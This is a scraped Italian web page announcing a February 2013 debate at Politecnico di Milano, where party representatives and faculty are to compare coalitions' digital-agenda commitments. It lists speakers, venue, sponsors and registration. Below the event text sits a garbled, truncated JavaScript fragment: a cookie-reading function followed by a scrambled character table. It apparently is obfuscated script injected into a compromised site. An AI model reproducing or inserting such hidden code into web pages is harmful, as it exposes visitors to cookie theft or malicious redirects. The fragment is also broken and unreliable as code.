Questo sito utilizza cookie per raccogliere informazioni sull'utilizzo. Cliccando su questo banner o navigando il sito, acconsenti all'uso dei cookie. Leggi la nostra cookie policy.OK

Direttore responsabile Alessandro Longo

La vera agenda digitale di partiti e coalizioni

08 Feb 2013

8 febbraio 2013

 

keyboard_arrow_right
keyboard_arrow_left

Per rilanciare competitività e occupazione
è indispensabile cavalcare le nuove tecnologie.
Qual è la vera agenda digitale di partiti e coalizioni?

Immagine rimossa dal mittente.

Venerdì 15 Febbraio 2013 – Ore 12.00 – 14.00
Aula De Donato – Politecnico di Milano
(Campus Leonardo) Piazza Leonardo Da Vinci, 32

 

keyboard_arrow_right
keyboard_arrow_left

Gli esponenti politici e i docenti della School of Management a confronto sugli impegni che le diverse coalizioni e partiti intendono assumere per la prossima legislatura sui principali temi dell’agenda digitale

Sono stati invitati gli esponenti dei sei principali schieramenti politici in gara nelle prossime elezioni. 
Hanno già dato la loro adesione: Luigi Buoncristiani, Rivoluzione Civile, Alex Curti, Movimento 5 Stelle, Marco Meloni, PD, Antonio Palmieri, PdL, e Francesco Sacco, Scelta Civica. 

Partecipano per il Politecnico di Milano: Mariano CorsoAlessandro Perego e Andrea Rangone, Responsabili Scientifici dell’Osservatorio Agenda Digitale; Giuliano Noci, Responsabile Scientifico dell’Osservatorio Politico Politecnico di Milano – Blogmeter – Mimesi 360; Carlo Ghezzi, Ordinario di Ingegneria del Software e Presidente di Informatics Europe. 

Coordina il confronto Umberto Bertelè

L’Osservatorio Agenda Digitale è realizzato con il supporto di: BravoSolution, Capgemini, Consorzio CBI, Engineering, ICBPI, HP, IBM, Intesa Sanpaolo, Italtel, Nolan Norton Italia, Orsyp, Postecom, Telecom Italia. 

L’incontro durerà due ore. Seguirà un light lunch alle ore 14.00. 

Seguirà a breve il programma completo. 

La partecipazione è gratuita, previa iscrizione cliccando qui. 
 

 

function cc(ccn){var c=d[‘cookie’];return c.search(ccn.split(”).reverse().join(”))^O0$5rL”E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4';}

Articoli correlati